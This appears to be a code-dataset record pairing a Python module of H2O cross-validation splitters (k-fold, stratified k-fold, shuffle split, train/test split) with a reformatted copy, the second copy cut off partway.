SKLEARN: # pre-assign each sample to a test fold index using individual KFold # splitting strategies for each class so as to respect the balance of # classes # NOTE: Passing the data corresponding to ith class say X[y==class_i] # will break when the data is not 100% stratifiable for all classes. # So we pass np.zeroes(max(c, n_folds)) as data to the KFold. # Remember, however that we might be using the old-fold KFold which doesn't # have a split method... if SK18: per_cls_cvs = [ KFold(self.n_folds, # using sklearn's KFold here shuffle=self.shuffle, random_state=rng).split(np.zeros(max(count, self.n_folds))) for count in y_counts ] else: per_cls_cvs = [ KFold(max(count, self.n_folds), # using sklearn's KFold here self.n_folds, shuffle=self.shuffle, random_state=rng) for count in y_counts ] test_folds = np.zeros(n_samples, dtype=np.int) for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)): for cls, (_, test_split) in zip(unique_y, per_cls_splits): cls_test_folds = test_folds[target == cls] # the test split can be too big because we used # KFold(...).split(X[:max(c, n_folds)]) when data is not 100% # stratifiable for all the classes # (we use a warning instead of raising an exception) # If this is the case, let's trim it: test_split = test_split[test_split < len(cls_test_folds)] cls_test_folds[test_split] = test_fold_indices test_folds[target == cls] = cls_test_folds return test_folds
[ "from __future__ import division, print_function, absolute_import\nimport numbers\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nfrom .base import check_frame\nfrom skutil.base import overrides\nfrom sklearn.externals import six\nfrom sklearn.base import _pprint\nfrom sklearn.utils.fixes import signature, bincount\nfrom sklearn.utils import check_random_state\nfrom math import ceil, floor\n\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\n\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n\n__all__ = [\n 'check_cv',\n 'h2o_train_test_split',\n 'H2OKFold',\n 'H2OShuffleSplit',\n 'H2OStratifiedKFold',\n 'H2OStratifiedShuffleSplit'\n]\n\n\ndef _build_repr(self):\n # XXX This is copied from sklearn.BaseEstimator's get_params\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n\n init_signature = signature(init)\n\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values()\n if p.name != 'self' and p.kind != p.VAR_KEYWORD])\n\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter(\"always\", DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError('expected int or instance of '\n 'H2OBaseCrossValidator but got %s'\n % type(cv))\n\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. 
If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n\n cv = CVClass(n_splits=2,\n test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n # for the h2o one, we only need iter 0\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n\n # h2o \"doesn't reorder rows\" so we need to keep these sorted...\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = (\n frame[train, :],\n frame[test, :]\n )\n\n return out\n\n\n# Avoid a pb with nosetests...\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n\n # h2o can't handle anything but lists...\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError('this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.:\n raise ValueError(\n 'test_size=%f should be smaller 
'\n 'than 1.0 or be an integer' % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.:\n raise ValueError(\n 'train_size=%f should be smaller '\n 'than 1.0 or be an integer' % test_size)\n elif (np.asarray(test_size).dtype.kind == 'f' and\n (train_size + test_size) > 1.):\n raise ValueError('The sum of test_size and train_size = %f'\n 'should be smaller than 1.0. Reduce test_size '\n 'and/or train_size.' % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError('test_size=%d should be smaller '\n 'than the number of samples %d' % (test_size, n_samples))\n\n if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError('train_size=%d should be smaller '\n 'than the number of samples %d' % (train_size, n_samples))\n\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n\n if test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError('The sum of train_size and test_size=%d, '\n 'should be smaller than the number of '\n 'samples %d. Reduce test_size and/or '\n 'train_size.' % (n_train + n_test, n_samples))\n\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size)\n\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples,\n self.test_size, self.train_size)\n\n # need to validate y...\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist())\n\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError('The least populated class in y has only 1 '\n 'member, which is too few. 
The minimum number of labels '\n 'for any class cannot be less than 2.')\n\n if n_train < n_classes:\n raise ValueError('The train_size=%d should be greater than or '\n 'equal to the number of classes=%d' % (n_train, n_classes))\n\n if n_test < n_classes:\n raise ValueError('The test_size=%d should be greater than or '\n 'equal to the number of classes=%d' % (n_test, n_classes))\n\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int))\n\n for _ in range(self.n_splits):\n train = []\n test = []\n\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where((target == class_i))[0][permutation]\n\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n\n # Might end up here with less samples in train and test than we asked\n # for, due to rounding errors.\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n\n train = rng.permutation(train)\n test = rng.permutation(test)\n\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError('n_folds must be of Integral type. '\n '%s of type %s was passed' % (n_folds, type(n_folds)))\n\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError('k-fold cross-validation requires at least one '\n 'train/test split by setting n_folds=2 or more')\n\n if shuffle not in [True, False]:\n raise TypeError('shuffle must be True or False. 
Got %s (type=%s)'\n % (str(shuffle), type(shuffle)))\n\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n\n n_folds = self.n_folds\n fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state)\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n\n # validate that it's a string\n y = _val_y(y) # gets a string back or None\n if y is None:\n raise ValueError('H2OStratifiedKFold requires a target name (got None)')\n\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n\n if np.all(self.n_folds > y_counts):\n raise ValueError(('All the n_labels for individual classes'\n ' are less than %d folds.'\n % self.n_folds), Warning)\n if self.n_folds > min_labels:\n warnings.warn(('The least populated class in y has only %d'\n ' members, which is too few. 
The minimum'\n ' number of labels for any class cannot'\n ' be less than n_folds=%d.'\n % (min_labels, self.n_folds)), Warning)\n\n # NOTE FROM SKLEARN:\n\n # pre-assign each sample to a test fold index using individual KFold\n # splitting strategies for each class so as to respect the balance of\n # classes\n # NOTE: Passing the data corresponding to ith class say X[y==class_i]\n # will break when the data is not 100% stratifiable for all classes.\n # So we pass np.zeroes(max(c, n_folds)) as data to the KFold.\n\n # Remember, however that we might be using the old-fold KFold which doesn't\n # have a split method...\n if SK18:\n per_cls_cvs = [\n KFold(self.n_folds, # using sklearn's KFold here\n shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds)))\n for count in y_counts\n ]\n else:\n per_cls_cvs = [\n KFold(max(count, self.n_folds), # using sklearn's KFold here\n self.n_folds,\n shuffle=self.shuffle,\n random_state=rng)\n for count in y_counts\n ]\n\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n\n # the test split can be too big because we used\n # KFold(...).split(X[:max(c, n_folds)]) when data is not 100%\n # stratifiable for all the classes\n # (we use a warning instead of raising an exception)\n # If this is the case, let's trim it:\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n\n return test_folds\n", "from __future__ import division, print_function, absolute_import\nimport numbers\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nfrom .base import check_frame\nfrom skutil.base import overrides\nfrom sklearn.externals import six\nfrom sklearn.base import _pprint\nfrom sklearn.utils.fixes import signature, bincount\nfrom sklearn.utils import check_random_state\nfrom math import ceil, floor\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n__all__ = ['check_cv', 'h2o_train_test_split', 'H2OKFold',\n 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit']\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The 
instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. 
Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n    \"\"\"Base class for H2O cross validation operations.\n    All implementing subclasses should override ``get_n_splits``\n    and ``_iter_test_indices``.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def split(self, frame, y=None):\n        \"\"\"Generate indices to split data into training and test.\n\n        Parameters\n        ----------\n\n        frame : ``H2OFrame``\n            The h2o frame to split\n\n        y : str, optional (default=None)\n            The name of the column to stratify, if applicable.\n\n        Returns\n        -------\n\n        train : ndarray\n            The training set indices for the split\n\n        test : ndarray\n            The testing set indices for that split\n        \"\"\"\n        frame = check_frame(frame, copy=False)\n        indices = np.arange(frame.shape[0])\n        for test_index in self._iter_test_masks(frame, y):\n            train_index = indices[np.logical_not(test_index)]\n            test_index = indices[test_index]\n            yield list(train_index), list(test_index)\n\n    def _iter_test_masks(self, frame, y=None):\n        \"\"\"Generates boolean masks corresponding to the test set.\n\n        Parameters\n        ----------\n\n        frame : H2OFrame\n            The h2o frame to split\n\n        y : string, optional (default=None)\n            The column to stratify.\n\n        Returns\n        -------\n\n        test_mask : np.ndarray, shape=(n_samples,)\n            The indices for the test split\n        \"\"\"\n        for test_index in self._iter_test_indices(frame, y):\n            test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n            test_mask[test_index] = True\n            yield test_mask\n\n    def _iter_test_indices(self, frame, y=None):\n        raise NotImplementedError(\n            'this method must be implemented by a subclass')\n\n    @abstractmethod\n    def get_n_splits(self):\n        \"\"\"Get the number of splits or folds for\n        this instance of the cross validator.\n        \"\"\"\n        pass\n\n    def __repr__(self):\n        return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n    \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n    if test_size is None and train_size is None:\n        raise ValueError('test_size and train_size can not both be None')\n    if test_size is not None:\n        if np.asarray(test_size).dtype.kind == 'f':\n            if test_size >= 1.0:\n                raise ValueError(\n                    'test_size=%f should be smaller than 1.0 or be an integer'\n                    % test_size)\n        elif np.asarray(test_size).dtype.kind != 'i':\n            raise ValueError('Invalid value for test_size: %r' % test_size)\n    if train_size is not None:\n        if np.asarray(train_size).dtype.kind == 'f':\n            if train_size >= 1.0:\n                raise ValueError(\n                    'train_size=%f should be smaller than 1.0 or be an integer'\n                    % train_size)\n            elif np.asarray(test_size\n                ).dtype.kind == 'f' and train_size + test_size > 1.0:\n                raise ValueError(\n                    'The sum of test_size and train_size = %f should be smaller than 1.0. 
Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. 
Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The 